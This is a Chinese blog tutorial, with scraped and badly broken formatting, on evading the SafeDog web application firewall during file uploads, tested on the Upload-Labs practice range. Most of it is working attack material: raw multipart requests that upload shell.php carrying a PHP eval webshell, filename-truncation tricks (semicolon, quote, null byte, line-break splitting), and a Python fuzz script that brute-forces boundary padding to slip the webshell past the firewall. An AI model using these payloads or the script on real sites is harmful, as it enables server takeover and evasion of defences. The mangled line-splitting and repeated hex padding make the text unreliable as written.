     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bfWebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "submit"
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     上传
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bfWebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9--
boundray末尾插入垃圾数据

刚才讲到过boundary末尾可以插入任何数据,那么就可以在boundary字符串末尾加入大量垃圾数据。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     POST 
     
     /Pass-
     
     01
     
     /
     
     index.php HTTP
     
     /
     
     1.1
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Host: hackrock.com:
     
     813
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: multipart
     
     /form-data; boundary
     
     =----WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf,bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bfWebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Connection: 
     
     close
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Length: 
     
     592
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "upload_file"; filename
     
     =
     
     "shell.php"
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image
     
     /png
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <?php @eval($_POST[
     
     'x']);?
     
     >
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "submit"
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     上传
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf--
multipart/form-data与boundary之间插入垃圾数据

刚才讲到过multipart/form-databoundary之间可以插入任何数据,那么就可以在multipart/form-databoundary之间加入大量垃圾数据。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     POST 
     
     /Pass-
     
     01
     
     /
     
     index.php HTTP
     
     /
     
     1.1
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Host: hackrock.com:
     
     813
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: multipart
     
     /form-data bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bfWebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9boundary
     
     =----WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Connection: 
     
     close
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Length: 
     
     319
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "upload_file"; filename
     
     =
     
     "shell.php"
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image
     
     /png
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <?php @eval($_POST[
     
     'x']);?
     
     >
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "submit"
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     上传
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf--

数据截断

回车换行截断

POST请求头的值(不是请求头)是可以换行的,但是中间不得有空行。若WAF匹配文件名到换行截止,则可以绕过。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: 
     
     for
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     m-data; name
     
     =
     
     "upload_
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     file"; fi
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     le
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     name
     
     =
     
     "sh
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ell.p
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     h
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     p"
分号截断

若WAF匹配文件名到分号截止,则可以绕过。

Content-Disposition: form-data; name="upload_file"; filename="shell.jpg;.php"
引号截断

php<5.3 单双引号截断特性。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "upload_file"; filename
     
     =
     
     "shell.jpg'.php"
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "upload_file"; filename
     
     =
     
     "shell.jpg".php
     
     "
00截断

在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留,所以当url中出现%00时就会认为读取已结束。这里使用[0x00]代替16进制的00字符

Content-Disposition: form-data; name="upload_file"; filename="shell.php[0x00].jpg"

实战-绕过安全狗文件上传

实验环境

靶场:Upload-Labs(Pass-1)

数据库:MySQL 5.5

Web脚本:PHP 5.4.19

WAF:网站安全狗(Apache版)v4.0.3025

在测试时,网站安全狗仅开启上传防护,否则会因为误报删除靶场文件。

图片

image-20220122153541822

实战一 - 编写Fuzz脚本利用数据溢出绕过

由于boundary字符串中可以加入大量垃圾数据,这里就编写了一个Fuzz脚本进行测试能否绕过:


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     #! 
     
     /usr
     
     /bin
     
     /env python
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     # _
     
     *_  coding:utf-
     
     8 _
     
     *_
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     import requests
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     import 
     
     random
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     url
     
     =
     
     "http://hackrock.com:813/Pass-01/index.php"
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     def 
     
     generate_
     
     random_str(randomlength
     
     =
     
     16):
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         
     
     random_str 
     
     = 
     
     ''
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         base_str 
     
     = 
     
     'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         
     
     length 
     
     = len(base_str) - 
     
     1
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         
     
     for i 
     
     in range(randomlength):
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             
     
     random_str 
     
     +
     
     = base_str[
     
     random.randint(
     
     0length)]
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         
     
     return 
     
     random_str
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     for i 
     
     in range(
     
     10,8000,50):
    
    
    
   
   
  18. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         stri 
     
     = 
     
     generate_
     
     random_str(i)
    
    
    
   
   
  19. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         try:
    
    
    
   
   
  20. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  21. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             headers 
     
     = {
    
    
    
   
   
  22. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 
     
     "Host":
     
     "hackrock.com:813",
    
    
    
   
   
  23. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 
     
     "User-Agent":
     
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",
    
    
    
   
   
  24. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 
     
     "Referer":
     
     "http://hackrock.com:813/Pass-01/index.php",
    
    
    
   
   
  25. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 
     
     "Content-Type":
     
     "multipart/form-data; boundary=----" 
     
     + stri
    
    
    
   
   
  26. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             }
    
    
    
   
   
  27. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             payload 
     
     = 
     
     ""
     
     "
    
    
    
   
   
  28. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 ------"
     
     "" 
     
     + stri 
     
     +
     
     ""
     
     "
    
    
    
   
   
  29. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 Content-Disposition: form-data; name="upload_
     
     file
     
     "; filename="shell.php
     
     "
    
    
    
   
   
  30. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 Content-Type: image/png
    
    
    
   
   
  31. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     
    
    
    
   
   
  32. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 <?php @eval($_POST['hack']); ?>
    
    
    
   
   
  33. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     
    
    
    
   
   
  34. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 ------"
     
     "" 
     
     + stri 
     
     + 
     
     ""
     
     "
    
    
    
   
   
  35. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 Content-Disposition: form-data; name="submit
     
     "
    
    
    
   
   
  36. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     
    
    
    
   
   
  37. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 上传
    
    
    
   
   
  38. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 ------"
     
     "" 
     
     + stri 
     
     + 
     
     ""
     
     "--
    
    
    
   
   
  39. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     
    
    
    
   
   
  40. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             "
     
     ""
    
    
    
   
   
  41. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  42. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             response
     
     =requests.post(url
     
     =url,headers
     
     =headers,
     
     data
     
     =payload,timeout
     
     =
     
     0.5)
    
    
    
   
   
  43. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             result 
     
     = response.
     
     content
    
    
    
   
   
  44. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             print result
    
    
    
   
   
  45. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             print stri
    
    
    
   
   
  46. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             print 
     
     "\n"
    
    
    
   
   
  47. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             #print payload
    
    
    
   
   
  48. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             #print headers
    
    
    
   
   
  49. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             
     
     if result.
     
     count(
     
     '上传'):
    
    
    
   
   
  50. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 print 
     
     "Length is : %s " % str(i)
    
    
    
   
   
  51. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                 break
    
    
    
   
   
  52. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         except:
    
    
    
   
   
  53. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
             print 
     
     "."

这里使用的是python2.7进行编写,运行时确保装有python2的环境以及python库。

最后测出的结果如下,长度为3710个字符:

图片

image-20220122154848589

虽然并没有帮我们上传上去,但是可以成功绕过安全狗拦截。

我们将构造好的数据包放进Burp试试:

图片

image-20220122155843047

成功绕过。

实战二 - 利用00截断绕过

上传文件,使用Burp抓包,将filename的值改为:shell.php;.jpg

图片

image-20220122160953684

然后打开hex,(分号的16进制为0x3b)修改16进制内容,把3b改成00:

图片

image-20220122161153160

发送数据。

图片

image-20220122161340032

成功绕过。

推荐阅读

实战 | Bypass云锁MySQL注入总结

实战 | BypassD盾之SQL注入绕过总结

实战 | WAF-Bypass之SQL注入绕过安全狗

实战 | WAF-Bypass之SQL注入绕过思路总结

文件上传和WAF的攻与防

https://bbs.ichunqiu.com/thread-41672-1-1.html?from=beef

过waf实战之文件上传bypass总结

https://www.cnblogs.com/-qing-/p/10832850.html

文件上传突破waf总结

https://xz.aliyun.com/t/7531

文件上传Bypass安全狗

https://cloud.tencent.com/developer/article/1838786?from=article.detail.1933685

文件上传之WAF绕过及相安全防护

https://www.cnblogs.com/zhaohzaomumu/p/15130641.html

文件上传绕过WAF

https://www.cnblogs.com/cwkiller/p/11651054.html

炫彩@之星
关注
专栏目录
最全干货分享)渗透测试全流程归纳总结之四
深入交流学习:webMsec
04-19 459
0x02 漏洞挖掘 1.漏洞扫描工具 注意:登录类网站扫描要带cookies扫才能扫到 1.1Nikto Web服务漏洞扫描器 Tips:利用-Format选项来导出特定格式的扫描结果,使扫描结果更容易阅读和分析。 nikto -host http://example.com -output ~/nikto.html -Format html NIKTO使用方法: 1、命令:nikto -update #升级,更新插件; 2、Nikto -list-plugins #查看插件; 3、Nikto -host
干货 | 绕过WAF的常见Web漏洞利用分析
Python_paipai的博客
02-18 984
本文以最新版安全狗为例,总结一下我个人掌握的一些绕过WAF进行常见WEB漏洞利用的方法,希望能起到抛砖引玉的效果。如果师傅们有更好的方法,烦请不吝赐教。PS:本文仅用于技术研究与讨论,严禁用于任何非法用途,违者后果自负,作者与平台不承担任何责任。
WAF绕过文件上传
wangluoanquan111的博客
02-25 1719
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
定制SQLmap和WAF绕过
weixin_58954236的博客
09-23 1149
以sqli-lab第26关为例输入?id=1’ --+,报错字符型注入考虑闭合问题,输入?id=1’ and '1,但是回显中and和空格消失了,可知and和空格被过滤了因为and和or被过滤考虑使用双写绕过手段,空格使用其他字符进行代替例如%0a或%a0使用SQLmap扫描,结果无SQL注入漏洞可是明明手动测试存在SQL注入漏洞但是SQLmap竟然没有扫描出来,是因为SQLmap在进行注入的时候没有合适的绕过手法,被过滤掉了,那么就需要我们对SQLmap发送的payload进行编码。
.NET 一款绕过WAF拦截的新思路和工具
ahhacker86的专栏
07-13 360
Sharp4WebConfigCompilation是一款专为渗透时用于.NET入口打点的工具,其主要功能是通过更改站点默认配置来规避ASPX脚本头部声明,以此绕过Web应用防火墙(WAF)的拦截。这款工具的工作原理是通过修改web.config文件中的配置,使得ASPX脚本在不显式声明编译语言的情况下正常运行。
干货】记一次WAF对抗赛详解&全方位绕过WAF
Enweitech Software Works
07-02 1万+
0x01 preview 上个星期参加了某巨头厂商承办的挑战赛,比赛周期48小时,题目是成功渗透在安全宝保护下的五个通用cms靶场,其中包括论坛、商城、资源网站等 从靶场布置来看很明显是在测试安全宝对于几种不同类型cms的对攻击的防御能力。 这样的比赛模式区别于常见的CTF线上模式稍有不同,实战味道较强。常规的CTF在Web题目上面主要考察的是漏洞挖掘和利用,难点一般凸显在发现难和利
干货分享 | WAF与RASP对比 【附:任意文件上传漏洞防护实例】
weixin_55163056的博客
03-30 216
当然WAF也有自身的优势,攻击者进行真正的攻击之前,通常会制造大量的非正常流量,这些流量包括推测可注入点、服务器环境信息等,而WAF可以将所有的流量进行记录,且根据规则库内容进行拦截。以上列举了文件上传漏洞WAF防护常用的被绕过手段,WAF主要检测的是请求信息,包括请求地址、请求方式、参数、请求头等。RASP通过在应用程序的字节码中动态插桩检测“探针”,来获取应用程序各种运行时的上下文信息,在应用程序运行的时候,利用当前上下文信息实时保护应用,使应用程序具备自我保护能力,不需要进行人工干预。
实战 WAF-Bypass之SQL注入绕过思路总结
A_991128a的博客
11-05 228
WAF攻防研究之四个层次Bypass WAF那些可以绕过WAF的各种特性waf从入门到Bypasshttp://github.wh0ale.xyz/2019/12/04/waf从入门到Bypass/干货|各种WAF绕过手法学习利用分块传输绕WAF技术讨论 | 在HTTP协议层面绕过WAF
文件上传总结
ndjnddjxn的博客
04-25 911
文件上传漏洞是用户上传了一个可执行脚本,然后通过该文件获得访问服务器的权限的漏洞
干货 | DevSecOps在携程的最佳实践
携程技术
07-09 1535
作者简介Living,携程高级基础安全工程师,关注应用安全、渗透测试方面的技术。一、DevSecOps面临的挑战作为业务覆盖机票、酒店、度假、汽车票、火车票、支付等各个方面,为全球用户...
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3205
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
史上最全网络安全面试题总结
热门推荐
03-17 2万+
新的一年,难免有不少小伙伴面临跳槽或者找工作,本文总结了常见的安全岗位面试题,方便各位复习。祝各位事业顺利,财运亨通。 php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件找路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗
干货】XSS知识总结
hackzkaq的博客
10-27 6705
